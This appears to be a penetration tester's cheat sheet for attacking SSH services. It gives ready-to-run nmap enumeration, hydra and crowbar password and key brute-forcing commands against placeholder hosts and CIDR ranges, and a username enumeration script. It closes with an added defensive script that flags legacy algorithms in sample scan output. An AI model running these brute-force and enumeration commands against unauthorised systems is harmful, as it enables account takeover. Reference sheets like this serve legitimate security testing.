Target.Host.Service.SSH.txt
`` Scanning
~$ nmap -p 22 --script ssh-enum-algos,ssh-auth-methods,ssh-hostkey,ssh-publickey-acceptance,ssh-run VAR_TARGET_HOST
`` Generate public key from private
~$ ssh-keygen -f id_rsa -y > id_rsa.pub
`` Password Bruteforcing
-- Verbose (-V), ignore an existing restore file (-I), quit on first match (-F)
-- Default port
~$ hydra -V -I -F -L VAR_WORDLIST_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST
-- Maximum wait for a response 80 (-w), wait between connects 3 (-W), wait 1 per login attempt (-c)
~$ hydra -V -I -F -t 1 -w 80 -c 1 -W 3 -f -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST
-- Use single username and non-default port
~$ hydra -V -I -F -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -s VAR_TARGET_PORT -e nsr ssh://VAR_TARGET_HOST
-- Use combined file (login:pass) and host list
~$ hydra -V -F -C VAR_WORDLIST_COMBO -M VAR_TARGET_HOSTS ssh
`` With keys
-- Single
~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/id_rsa
-- All
~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/
-- All in discovery mode
~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/ -d
`` Enumerate users
~$ ssh_enum_time.py -U usernames.txt VAR_TARGET_HOST
`` Legacy issues
-- No matching key exchange method found
~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 VAR_USERNAME@VAR_TARGET_HOST
-- No matching host key type found
~$ ssh -oHostKeyAlgorithms=+ssh-dss VAR_USERNAME@VAR_TARGET_HOST
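-- Added example (not part of the original sheet): check ssh-enum-algos output from the scan above for the legacy algorithms named here and report the sshd_config keyword that controls each one.
-- The sample scan output, the function names and the algorithms beyond diffie-hellman-group1-sha1 and ssh-dss are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag legacy SSH algorithms in nmap ssh-enum-algos output.
# The first two names are the ones this sheet needs client overrides for;
# the rest are additions chosen for this example. Extend to match local policy.
LEGACY_ALGOS="diffie-hellman-group1-sha1 ssh-dss 3des-cbc arcfour hmac-md5"

# Reads nmap output on stdin; prints "<sshd_config keyword> <algorithm>" per finding.
flag_legacy_algos() {
  awk -v legacy="$LEGACY_ALGOS" '
    BEGIN {
      n = split(legacy, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1
      # nmap section name -> sshd_config keyword that controls that list
      kw["kex_algorithms"] = "KexAlgorithms"
      kw["server_host_key_algorithms"] = "HostKeyAlgorithms"
      kw["encryption_algorithms"] = "Ciphers"
      kw["mac_algorithms"] = "MACs"
    }
    {
      sub(/^[|]_?[ \t]*/, "")   # strip the "|" or "|_" script-output prefix
      if ($0 ~ /^[a-z_]+: [(][0-9]+[)]/) {   # section header, e.g. "kex_algorithms: (3)"
        section = $1; sub(/:$/, "", section); next
      }
      if ((section in kw) && ($1 in bad)) print kw[section], $1
    }'
}

# Constructed sample of ssh-enum-algos output (not from a real host).
sample_scan() {
  cat <<'EOF'
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-enum-algos:
|   kex_algorithms: (3)
|       curve25519-sha256
|       diffie-hellman-group14-sha256
|       diffie-hellman-group1-sha1
|   server_host_key_algorithms: (2)
|       ssh-ed25519
|       ssh-dss
|   encryption_algorithms: (2)
|       aes256-ctr
|       aes128-ctr
|   mac_algorithms: (2)
|       hmac-sha2-256
|_      hmac-md5
EOF
}
sample_scan | flag_legacy_algos
```

-- Each reported algorithm is one to drop from the matching keyword's list in sshd_config on the scanned server.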
`` PuTTY to OpenSSH
~$ puttygen id_rsa.ppk -O private-openssh -o id_rsa
~$ puttygen id_rsa.ppk -O public-openssh -o id_rsa.pub